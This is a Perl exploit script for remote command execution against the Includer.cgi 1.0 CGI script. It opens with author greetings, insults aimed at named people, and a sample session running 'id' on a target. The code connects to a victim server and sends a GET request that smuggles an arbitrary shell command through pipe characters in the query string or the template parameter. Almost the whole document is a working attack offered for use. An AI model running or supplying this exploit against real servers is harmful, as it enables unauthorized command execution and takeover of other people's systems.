# # [K-C0d3r] Includer.cgi 1.0 remote command execution [K-C0d3r] # # C0d3d By K-C0d3r, a www.x0n3-h4ck.org friend! # # I think the bug was discovered by Francisco Alisson. # # Greetz to: mZ, CorryL, Expanders, SiNaPsE, off, rikky, milw0rm. # # F**K o*f to all RxBot kiddies as e*****t, G***n, d***b. # ########################################################################## # [kc@K-C0d3r xpl]$ perl KCincluder.pl /cgi-bin/includer.cgi 1 # [K-C0d3r] Includer.cgi Remote Command Execution Exploit [K-C0d3r] # [?] Insert command: id # [+] Conecting to # [+] Connected to # [+] Injecting command ... # uid=500(kc) gid=500(kc) gruppi=500(kc) # [kc@K-C0d3r xpl]$ ########################################################################## use IO::Socket; sub Usage { print STDERR "Usage:\nKCinc-xpl.pl <www.victim.com> </path/to/includer.cgi> <exploitation_type>.\n"; print STDERR "Exploitation Types:\n \t\t1: includer.cgi?|command|\n \t\t2: includer.cgi?template=|command|\n\n"; exit; } if (@ARGV < 3) { Usage(); } $host = @ARGV[0]; $path = @ARGV[1]; print "[K-C0d3r] Includer.cgi Remote Command Execution Exploit [K-C0d3r]\n"; print "[?] Insert command: "; $command = <STDIN>; $type = @ARGV[2]; if ($type > 2) { Usage(); } print "[+] Conecting to $host\n"; if ($type = 1) { $injection = "$host$path?|$command|"; $socket = new IO::Socket::INET (PeerAddr => "$host", PeerPort => 80, Proto => 'tcp'); die unless $socket; print "[+] Connected to $host\n"; print "[+] Injecting command ...\n"; print $socket "GET http://$injection HTTP/1.1\nHost: $host\n\n"; while (<$socket>) { print $_; exit; } } if ($type = 2) { $injection = "$host$path?template=|$command|"; $socket = new IO::Socket::INET (PeerAddr => "$host", PeerPort => 80, Proto => 'tcp'); die unless $socket; print "[+] Connected to $host\n"; print "[+] Injecting command\n"; print $socket "GET http://$injection HTTP/1.1\nHost: $host\n\n"; while (<$socket>) { print $_; exit; } }